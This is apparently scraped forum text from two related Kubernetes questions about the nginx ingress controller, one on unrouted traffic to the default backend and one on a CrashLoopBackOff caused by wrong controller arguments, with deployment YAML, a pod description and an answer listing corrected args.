This ingress is defined for a hostname such as someapp.somehostname.com. However, this is a CNAME. The A record associated with this IP address is getting the problematic traffic I mentioned above (even though it's not defined in any of my Ingress definitions) and that traffic is not going to default backend when I think it should be. Does that make sense?
Edit:
Here's the result of kubectl get deployment fashionable-gopher-nginx-ingress-controller -n kube-system -o yaml:
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: 2018-07-03T21:02:46Z
generation: 1
labels:
app: nginx-ingress
chart: nginx-ingress-0.20.3
component: controller
heritage: Tiller
release: fashionable-gopher
name: fashionable-gopher-nginx-ingress-controller
namespace: kube-system
resourceVersion: "7461558"
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/fashionable-gopher-nginx-ingress-controller
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: nginx-ingress
component: controller
release: fashionable-gopher
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: nginx-ingress
component: controller
release: fashionable-gopher
spec:
containers:
- args:
- /nginx-ingress-controller
- --default-backend-service=kube-system/fashionable-gopher-nginx-ingress-default-backend
- --election-id=ingress-controller-leader
- --ingress-class=nginx
- --configmap=kube-system/fashionable-gopher-nginx-ingress-controller
env:
- name: POD_NAME
valueFrom:
fieldRef:
apiVersion: v1
fieldPath: metadata.name
- name: POD_NAMESPACE
valueFrom:
fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
image: quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.14.0
imagePullPolicy: IfNotPresent
livenessProbe:
failureThreshold: 3
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 1
name: nginx-ingress-controller
ports:
- containerPort: 80
name: http
protocol: TCP
- containerPort: 443
name: https
protocol: TCP
readinessProbe:
failureThreshold: 3
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 1
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
serviceAccount: fashionable-gopher-nginx-ingress
serviceAccountName: fashionable-gopher-nginx-ingress
terminationGracePeriodSeconds: 60
status:
availableReplicas: 1
conditions:
- lastTransitionTime: 2018-07-03T21:02:46Z
lastUpdateTime: 2018-07-03T21:02:46Z
message: Deployment has minimum availability.
reason: MinimumReplicasAvailable
status: "True"
type: Available
- lastTransitionTime: 2018-07-28T16:29:07Z
lastUpdateTime: 2018-07-28T16:31:53Z
message: ReplicaSet "fashionable-gopher-nginx-ingress-controller-69d44d4df4" has
successfully progressed.
reason: NewReplicaSetAvailable
status: "True"
type: Progressing
observedGeneration: 1
readyReplicas: 1
replicas: 1
updatedReplicas: 1
I want to set up an Ingress, which routes traffic to my underlying Services. Unfortunately, I get an error when I deploy my ingress-controller-deployment.yaml and I don't know why... The pod with the ingress-controller crashes immediately, with the error message "CrashLoopBackOff".
With my understanding the Ingress-Control has to be deployed in a Pod and this pod can be accessed through the ingress-svc. The ingress-svc seems to work, but the Pod crashes. After the ingress-controller works I need an additional file that defines the routes and everything. But I don't see the point of continuing with out a working and deployable ingress-controller.
Pod description:
Name: ingress-controller-7749c785f-x94ll
Namespace: ingress
Node: gke-cluster-1-default-pool-8484e77d-r4wp/10.128.0.2
Start Time: Thu, 26 Apr 2018 14:25:04 +0200
Labels: k8s-app=nginx-ingress-lb
pod-template-hash=330573419
Annotations: kubernetes.io/created-by={"kind":"SerializedReference","apiVersion":"v1","reference":{"kind":"ReplicaSet","namespace":"ingress","name":"ingress-controller-7749c785f","uid":"d8ff0a6d-494c-11e8-a840
-420...
Status: Running
IP: 10.8.0.14
Created By: ReplicaSet/ingress-controller-7749c785f
Controlled By: ReplicaSet/ingress-controller-7749c785f
Containers:
nginx-ingress-controller:
Container ID: docker://5654c7dffc44510132cba303d66ee570280f2cec235e4d4fa6ef8ad543e0c91d
Image: quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.9.0
Image ID: docker-pullable://quay.io/kubernetes-ingress-controller/nginx-ingress-controller#sha256:39cc6ce23e5bcdf8aa78bc28bbcfe0999e449bf99fe2e8d60984b417facc5cd4
Ports: 80/TCP, 443/TCP
Args:
/nginx-ingress-controller
--admin-backend-svc=$(POD_NAMESPACE)/admin-backend
State: Waiting
Reason: CrashLoopBackOff
Last State: Terminated
Reason: Error
Exit Code: 2
Started: Thu, 26 Apr 2018 14:26:57 +0200
Finished: Thu, 26 Apr 2018 14:26:57 +0200
Ready: False
Restart Count: 4
Liveness: http-get http://:10254/healthz delay=10s timeout=5s period=10s #success=1 #failure=3
Environment:
POD_NAME: ingress-controller-7749c785f-x94ll (v1:metadata.name)
POD_NAMESPACE: ingress (v1:metadata.namespace)
Mounts:
/var/run/secrets/kubernetes.io/serviceaccount from default-token-plbss (ro)
Conditions:
Type Status
Initialized True
Ready False
PodScheduled True
Volumes:
default-token-plbss:
Type: Secret (a volume populated by a Secret)
SecretName: default-token-plbss
Optional: false
QoS Class: BestEffort
Node-Selectors: <none>
Tolerations: node.alpha.kubernetes.io/notReady:NoExecute for 300s
node.alpha.kubernetes.io/unreachable:NoExecute for 300s
Ingress-controller-deployment.yaml
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: ingress-controller
spec:
replicas: 1
revisionHistoryLimit: 3
template:
metadata:
labels:
k8s-app: nginx-ingress-lb
spec:
containers:
- args:
- /nginx-ingress-controller
- "--admin-backend-svc=$(POD_NAMESPACE)/admin-backend"
env:
- name: POD_NAME
valueFrom:
fieldRef:
fieldPath: metadata.name
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
image: "quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.9.0"
imagePullPolicy: Always
livenessProbe:
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
timeoutSeconds: 5
name: nginx-ingress-controller
ports:
- containerPort: 80
name: http
protocol: TCP
- containerPort: 443
name: https
protocol: TCP
---
apiVersion: v1
kind: Service
metadata:
name: ingress-svc
spec:
type: LoadBalancer
ports:
- name: http
port: 80
targetPort: http
- name: https
port: 443
targetPort: https
selector:
k8s-app: nginx-ingress-lb
The issue is the args. The args on one of mine are
args:
- /nginx-ingress-controller
- --default-backend-service=$(POD_NAMESPACE)/default-http-backend
- --configmap=$(POD_NAMESPACE)/nginx-configuration
- --tcp-services-configmap=$(POD_NAMESPACE)/tcp-services
- --udp-services-configmap=$(POD_NAMESPACE)/udp-services
- --publish-service=$(POD_NAMESPACE)/ingress-nginx
- --annotations-prefix=nginx.ingress.kubernetes.io
I had also created the config maps for configuration, tcp and udp.